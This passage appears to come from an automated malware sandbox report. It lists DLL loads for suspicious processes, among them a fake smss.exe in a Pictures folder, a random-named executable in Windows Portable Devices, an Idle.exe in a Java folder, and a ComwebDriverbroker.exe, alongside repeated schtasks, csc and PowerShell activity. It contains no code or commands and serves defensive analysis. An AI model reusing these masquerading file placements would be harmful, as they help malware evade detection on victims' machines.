Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: apphelp.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: version.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: wldp.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: profapi.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: version.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: wldp.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: profapi.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\Pictures\smss.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
